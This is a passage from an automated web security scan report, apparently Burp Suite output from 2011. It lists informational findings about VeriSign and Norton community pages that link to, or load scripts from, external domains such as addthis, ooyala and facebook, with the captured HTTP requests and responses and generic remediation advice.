<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&amp;username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
</a>
or to <a href="http://forums.sun.com/index.jspa">Sun Forums</a>
...[SNIP]...
</a>
or to <a href="http://msdn.microsoft.com/en-us/library/aa141471.aspx">msdn Office Developer Center</a>
...[SNIP]...
</a>
Support or
to <a href="http://www.adobe.com/devnet/air/">Adobe AIR Developer Center</a>
...[SNIP]...
<p class="buy">
<a href="https://products.geotrust.com/signup/codesign.do?partner=geotrust.cs.geotrust">BUY NOW</a>
...[SNIP]...
<p class="renew">
<a href="http://www.geotrust.com/geocenter/customer-login/">SIGN IN</a>
...[SNIP]...
</a>
or to <a href="http://www.adobe.com/support/director/downloads.html">Director Support Center</a>
...[SNIP]...
</div>
<a href="http://www.symantec.com/connect/blogs/symantec-wins-code-project-s-2011-members-choice-award-authentication-tools-verisign-code-sign "><span id="awardBox" class="bottomBoxes">
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...
</script>
   <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...
<div style="display:inline;">
   <img height="1" width="1" style="border-style:none;" alt="" src="https://www.googleadservices.com/pagead/conversion/1072569688/?label=TRqGCKHUsQIQ2Lq4_wM&amp;guid=ON&amp;script=0"/>
   </div>
...[SNIP]...

14.69. http://www.verisign.com/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /trust-seal/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:13 GMT
Content-Type: text/html
Content-Length: 49851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<META HTTP-EQUIV="X-UA-Comp
...[SNIP]...
<noscript>
<iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0">
</iframe>
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.com&amp;lang=en">
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&amp;username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
<div id="vid_container">


<script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent">
</script>
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab">
<param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />
...[SNIP]...
<param name="wmode" value="transparent" />
       <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer">
</embed>
...[SNIP]...
<div id="logos" class="floatl">
<a href="http://www.facebook.com/VeriSignAuthentication"><img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"><img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"><img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...

14.70. http://www.verisign.com/verisign-worldwide/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /verisign-worldwide/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /verisign-worldwide/index.html?tid=footer HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:26:10 GMT
Content-Type: text/html
Content-Length: 42646

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
   <head>
               
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.com&amp;lang=en">
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img alt="Email" title="Email" src="http://cdn.verisign.com/assets/shared/images/dev044079.gif"/>
...[SNIP]...
<img src="http://cdn.verisign.com/assets/shared/images/dev044080.gif"/><a href="//www.addthis.com/bookmark.php?v=250&amp;username=verisign" class="addthis_button" addthis:ui_click="true"><img alt="Share" title="Share" src="http://cdn.verisign.com/assets/shared/images/dev044077.gif"/>
...[SNIP]...
<p name="p1" id="p1">
                               VeriSign Authentication Services, now part of
                               <a href="//www.symantec.com">Symantec Corp.</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.be/">Belgium</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.dk/">Denmark</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.fr/">France</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.de/">Germany</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.it/">Italy</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.es/">Spain</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.se/">Sweden</a>
...[SNIP]...
<li>
                                                   <a target="_top" href="//www.verisign.ch/">Switzerland</a>
...[SNIP]...
<p class="greytext">
                                               If your country is not listed above please visit our English language site
                                               <a id="qlinks" class="qlink greytext" target="_top" href="//www.verisign.ch/">VeriSign Switzerland</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.be/'>VeriSign Belgium</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.dk/'>VeriSign Denmark</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.fr/'>VeriSign France</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.de/'>VeriSign Germany</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.it/'>VeriSign Italy</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.es/'>VeriSign Spain</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.se/'>VeriSign Sweden</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.ch/'>VeriSign Switzerland</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisignchina.com.cn/'>VeriSign China</a>
...[SNIP]...
<li>
                                                       <a href='//www.verisign.in/'>VeriSign India</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=contact-verisign'>Contact VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/business/theme.jsp?themeid=verisign-authentication-products'>About VeriSign</a>
...[SNIP]...
<li><a href='http://www.symantec.com/about/news/release/index.jsp?tid=footer'>News</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>). Symantec products include <a href='//us.norton.com/index.jsp'>Norton antivirus software</a>, <a href='http://smallbusiness.norton.com?inid=soho_verisign_footer'>Norton internet security solutions for small business</a>, and <a href='http://www.pctools.com'>PC Tools</a>
...[SNIP]...

15. Cross-domain script include
There are 45 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


15.1. http://blogs.verisign.com/web-user-experience/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.verisign.com
Path:   /web-user-experience/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /web-user-experience/ HTTP/1.1
Host: blogs.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:59 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/5.0.4
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70620

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>
<tit
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/launch-of-eperspectives-executive-blog.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-logo-gets-a-sharper-profile.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/08/geotrust-homepage-facelift.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/07/introducing-trust-seal-monthly-service.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/what-the-first-ever-website-teaches-us-about-usability.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/firefox-5-offers-improved-text-and-multimedia-capabilities.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-code-signing-redesign.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/launch-of-always-on-ssl-and-firesheep-attacks-page.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/06/redesign-simplifies-options-for-getting-trust-seal.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-video-banner-interactivity-debuts-on-geotrust-website.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/study-users-choose-convenience-over-clicks.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
<span style="font-size:11px;">
<script src="http://feeds.feedburner.com/~s/WebUserExperienceBlog?i=http://blogs.verisign.com/web-user-experience/2011/05/new-rapidssl-seal-design-avail.php" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="//s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/typepad.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ReshmaKumar.json?callback=twitterCallback2&amp;count=5"></script>
...[SNIP]...
</div>
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

15.2. http://community.norton.com/norton/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.norton.com
Path:   /norton/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /norton/ HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 81813

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<!-- START OMNITURE JAVASCRIPT INCLUDES -->
<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/77C9F3D724AC1AE6812CFEF77A811FB9/lia-scripts-body-min.js"></script>
...[SNIP]...

15.3. http://community.norton.com/t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.norton.com
Path:   /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Cybercrime-Frontline-Blog/bg-p/cybercrimefrontline HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 339433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
<!-- START OMNITURE JAVASCRIPT INCLUDES -->
<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"></script>
...[SNIP]...

15.4. http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://community.norton.com
Path:   /t5/Norton-Protection-Blog/bg-p/npb1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /t5/Norton-Protection-Blog/bg-p/npb1 HTTP/1.1
Host: community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:48 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8b
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 422706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
<![endif]-->

<script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en&ct=us&sg=norton&url=/norton/index.jsp&domain=www.symantec.com&analytics=n"></script>

<script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/0FFDFD01A03AA87ABAC1D623C7586B4B/lia-scripts-head-min.js"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&amp;embedCode=4wNTh0OokmJIZVk29a3GDSLrYrBTfMFc&amp;height=370&amp;playerContainerId=lia-vid-4wNTh0OokmJIZVk29a3GDSLrYrBTfMFcw640h370r865&amp;width=640&amp;wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&amp;embedCode=o4d2ZxOjymhjnOVjrWcXiS1riXUG85aO&amp;height=338&amp;playerContainerId=lia-vid-o4d2ZxOjymhjnOVjrWcXiS1riXUG85aOw600h338r689&amp;width=600&amp;wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&amp;embedCode=5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7&amp;height=370&amp;playerContainerId=lia-vid-5ycDFxOncMJl2IHPFN4PhLt8nmIf7ie7w640h370r944&amp;width=640&amp;wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&amp;embedCode=RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFs&amp;height=370&amp;playerContainerId=lia-vid-RzZHRvOhdx_VViVJ_TdhL2sVE2on3zFsw640h370r895&amp;width=640&amp;wmode=opaque"></script>
...[SNIP]...
</div><script src="http://api.ooyala.com/player.js?callback=LITHIUM.Video&amp;embedCode=VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6n&amp;height=360&amp;playerContainerId=lia-vid-VndDhvOsVCbAEPlo-9bTbWNmRB0B9X6nw640h360r928&amp;width=640&amp;wmode=opaque"></script>
...[SNIP]...
<!-- START OMNITURE JAVASCRIPT INCLUDES -->
<script src="http://www.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
<script src="http://www.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</div><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/DA34F51B38ECCEA28CC9A83474C0A92F/lia-scripts-common-min.js"></script><script type="text/javascript" src="http://connect.facebook.net/en_US/all.js"></script><script type="text/javascript" src="http://norton.i.lithium.com/t5/scripts/9D414BED3E153BDC6FADA2E5942F37D4/lia-scripts-body-min.js"></script>
...[SNIP]...

15.5. http://de.community.norton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://de.community.norton.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: de.community.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:41:46 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 59970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <link class="lia-link
...[SNIP]...
